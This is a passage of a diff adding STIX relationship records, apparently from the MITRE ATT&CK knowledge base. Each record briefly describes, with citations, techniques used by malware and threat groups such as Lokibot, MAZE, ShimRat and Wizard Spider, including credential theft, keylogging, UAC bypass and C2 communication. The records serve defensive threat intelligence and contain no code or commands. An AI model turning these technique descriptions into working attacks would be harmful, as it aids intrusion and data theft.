+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) has decompressed its core DLL using shellcode once an impersonated antivirus component was running on a system.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--980a5f66-14d7-42c6-82f7-ef96cbab77bb",
+ "type": "relationship",
+ "modified": "2020-05-27T23:28:38.310Z",
+ "created": "2020-05-15T15:04:34.552Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) has been delivered as a package that includes compressed DLL and shellcode payloads within a .dat file.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--b057569e-0e0b-4e8e-9955-016a556b8248",
+ "type": "relationship",
+ "modified": "2020-05-27T23:28:38.343Z",
+ "created": "2020-05-15T15:04:34.555Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) has the capability to upload collected files to a C2.(Citation: FOX-IT May 2016 Mofang)\t",
+ "relationship_type": "uses",
+ "id": "relationship--d6d72bc4-c8d7-48b3-96c3-84a9810333d2",
+ "type": "relationship",
+ "modified": "2020-05-27T23:28:38.347Z",
+ "created": "2020-05-15T15:04:34.559Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) has registered two registry keys for shim databases.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--f81b567d-9fd3-44f4-bd6b-9ba6f386609e",
+ "type": "relationship",
+ "modified": "2020-05-27T23:28:38.346Z",
+ "created": "2020-05-15T15:04:34.561Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) can hijack the cryptbase.dll within migwiz.exe to escalate privileges and bypass UAC controls.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--58238854-4649-4cea-a43d-aae442dc60a6",
+ "type": "relationship",
+ "modified": "2020-05-27T23:28:38.345Z",
+ "created": "2020-05-15T15:04:34.563Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) can impersonate Windows services and antivirus products to avoid detection on compromised systems.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--684b6701-559f-4ba9-a2b0-f79ed5683eb1",
+ "type": "relationship",
+ "modified": "2020-05-27T23:28:38.481Z",
+ "created": "2020-05-15T15:36:44.007Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "FSecure Lokibot November 2019",
+ "url": "https://www.f-secure.com/v-descs/trojan_w32_lokibot.shtml",
+ "description": "Kazem, M. (2019, November 25). Trojan:W32/Lokibot. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has the ability to discover the username on the infected host.(Citation: FSecure Lokibot November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3ccef052-7ac9-47b1-9be6-8c140f279941",
+ "type": "relationship",
+ "modified": "2020-05-15T16:50:05.752Z",
+ "created": "2020-05-15T16:50:05.752Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "FSecure Lokibot November 2019",
+ "url": "https://www.f-secure.com/v-descs/trojan_w32_lokibot.shtml",
+ "description": "Kazem, M. (2019, November 25). Trojan:W32/Lokibot. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has the ability to discover the computer name and Windows product name/version.(Citation: FSecure Lokibot November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a9e6a51e-69b1-4b21-9db1-5aabdded2f0a",
+ "type": "relationship",
+ "modified": "2020-05-18T22:00:40.779Z",
+ "created": "2020-05-15T16:50:05.775Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "external_references": [
+ {
+ "source_name": "Infoblox Lokibot January 2019",
+ "url": "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22",
+ "description": "Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has the ability to copy itself to a hidden file and directory.(Citation: Infoblox Lokibot January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--af1fc367-9987-4076-9ce6-2414cd2d4a1f",
+ "type": "relationship",
+ "modified": "2020-05-15T16:50:05.777Z",
+ "created": "2020-05-15T16:50:05.777Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "FSecure Lokibot November 2019",
+ "url": "https://www.f-secure.com/v-descs/trojan_w32_lokibot.shtml",
+ "description": "Kazem, M. (2019, November 25). Trojan:W32/Lokibot. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has the ability to initiate contact with command and control (C2) to exfiltrate stolen data.(Citation: FSecure Lokibot November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7cafb7b2-5227-4340-b531-7bd134645d30",
+ "type": "relationship",
+ "modified": "2020-05-15T16:50:05.780Z",
+ "created": "2020-05-15T16:50:05.780Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "external_references": [
+ {
+ "source_name": "FSecure Lokibot November 2019",
+ "url": "https://www.f-secure.com/v-descs/trojan_w32_lokibot.shtml",
+ "description": "Kazem, M. (2019, November 25). Trojan:W32/Lokibot. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has the ability to capture input on the compromised host via keylogging.(Citation: FSecure Lokibot November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--6494b2d2-8f8f-4e81-886c-dadd57df6edc",
+ "type": "relationship",
+ "modified": "2020-05-15T16:50:05.782Z",
+ "created": "2020-05-15T16:50:05.782Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
+ "external_references": [
+ {
+ "source_name": "Infoblox Lokibot January 2019",
+ "url": "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22",
+ "description": "Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has demonstrated the ability to steal credentials from multiple applications and data sources including Safari and the Chromium and Mozilla Firefox-based web browsers.(Citation: Infoblox Lokibot January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--fe69bcdd-8df4-44e3-8994-b46e4d4c8aac",
+ "type": "relationship",
+ "modified": "2020-05-15T16:50:05.783Z",
+ "created": "2020-05-15T16:50:05.783Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0",
+ "external_references": [
+ {
+ "source_name": "Infoblox Lokibot January 2019",
+ "url": "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22",
+ "description": "Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has stolen credentials from multiple applications and data sources including Windows OS credentials, email clients, FTP, and SFTP clients.(Citation: Infoblox Lokibot January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1f888716-1e49-4d8d-b693-67c6eae8a775",
+ "type": "relationship",
+ "modified": "2020-05-18T13:42:53.799Z",
+ "created": "2020-05-15T16:50:05.805Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Infoblox Lokibot January 2019",
+ "url": "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22",
+ "description": "Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has used HTTP for C2 communications.(Citation: Infoblox Lokibot January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--e129d95a-e98e-4bf8-b065-57651dc3335d",
+ "type": "relationship",
+ "modified": "2020-05-18T22:00:40.786Z",
+ "created": "2020-05-15T16:50:05.817Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) can modify file attributes to hide files.(Citation: McAfee Sharpshooter December 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--f1992fc5-5013-4fad-9a43-74a7f2b9e3ec",
+ "type": "relationship",
+ "modified": "2020-06-23T00:42:36.436Z",
+ "created": "2020-05-15T16:55:19.294Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1",
+ "target_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "relationship_type": "uses",
+ "id": "relationship--1a5f6f44-56a3-4219-af5c-1753e17d72d6",
+ "type": "relationship",
+ "modified": "2020-05-15T17:03:13.020Z",
+ "created": "2020-05-15T16:56:55.451Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1",
+ "target_ref": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Sharpshooter](https://attack.mitre.org/groups/G0104) has sent malicious Word OLE documents to victims.(Citation: McAfee Sharpshooter December 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--abb78042-19f1-4ddf-82bb-afc67daeeca1",
+ "type": "relationship",
+ "modified": "2020-05-15T17:03:12.918Z",
+ "created": "2020-05-15T17:03:12.918Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used WMI and LDAP queries for network discovery.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1fa97951-8eba-4771-bc42-8084967f0c65",
+ "type": "relationship",
+ "modified": "2020-05-18T12:52:08.756Z",
+ "created": "2020-05-15T18:52:17.468Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c",
+ "external_references": [
+ {
+ "source_name": "FireEye Ryuk and Trickbot January 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
+ "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used AdFind.exe to collect information about Active Directory groups and accounts.(Citation: FireEye Ryuk and Trickbot January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7af53b3b-0e82-4839-b69a-e47a5001218c",
+ "type": "relationship",
+ "modified": "2020-05-18T12:37:03.945Z",
+ "created": "2020-05-18T12:37:03.945Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "FSecure Lokibot November 2019",
+ "url": "https://www.f-secure.com/v-descs/trojan_w32_lokibot.shtml",
+ "description": "Kazem, M. (2019, November 25). Trojan:W32/Lokibot. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has the ability to discover the domain name of the infected host.(Citation: FSecure Lokibot November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d331f4b3-047a-4418-9611-f2b8445692b3",
+ "type": "relationship",
+ "modified": "2020-05-18T13:38:59.051Z",
+ "created": "2020-05-18T13:38:59.051Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "ClearSky MuddyWater June 2019",
+ "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used HTTP for C2 communications.(Citation: ClearSky MuddyWater June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7700e443-2a26-43ba-9557-4c6f11bfbde1",
+ "type": "relationship",
+ "modified": "2020-05-20T20:37:42.721Z",
+ "created": "2020-05-18T17:29:30.916Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
+ "target_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "external_references": [
+ {
+ "source_name": "ClearSky MuddyWater June 2019",
+ "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has exploited the Office vulnerability CVE-2017-0199 for execution.(Citation: ClearSky MuddyWater June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f5e6ce32-60e2-4a2c-8cc9-efb9d613a8e4",
+ "type": "relationship",
+ "modified": "2020-05-20T20:26:59.680Z",
+ "created": "2020-05-18T17:29:30.919Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has injected the malware DLL into a target process.(Citation: McAfee Maze March 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--44fab50d-4fb6-4a8a-ab7a-84dcb70443f5",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.393Z",
+ "created": "2020-05-18T17:31:39.355Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has forged POST strings with a random choice from a list of possibilities including \"forum\", \"php\", \"view\", etc. while making connection with the C2, hindering detection efforts.(Citation: McAfee Maze March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--6a521aa4-d389-4ef4-bd24-442d8af23333",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.397Z",
+ "created": "2020-05-18T17:31:39.357Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has communicated to hard-coded IP addresses via HTTP.(Citation: McAfee Maze March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--9c89cfe5-1a9f-4b2d-82e2-f1638cb13b58",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.395Z",
+ "created": "2020-05-18T17:31:39.359Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has used the \"WNetOpenEnumW\", \"WNetEnumResourceW\u201d, \u201cWNetCloseEnum\u201d and \u201cWNetAddConnection2W\u201d functions to enumerate the network resources on the infected machine.(Citation: McAfee Maze March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--2f3d9b76-bec9-4cee-9a9b-1c42f373ec86",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.399Z",
+ "created": "2020-05-18T17:31:39.376Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has used the \u201cWow64RevertWow64FsRedirection\u201d function following attempts to delete the shadow volumes, in order to leave the system in the same state as it was prior to redirection.(Citation: McAfee Maze March 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--cabbe975-9936-4a9a-8fae-a747b3dc7a9d",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.447Z",
+ "created": "2020-05-18T17:31:39.413Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has disabled dynamic analysis and other security tools including IDA debugger, x32dbg, and OllyDbg.(Citation: McAfee Maze March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--dc9d4208-5e09-437e-bdd1-0dbfc4b54355",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.443Z",
+ "created": "2020-05-18T17:31:39.464Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "FireEye Maze May 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
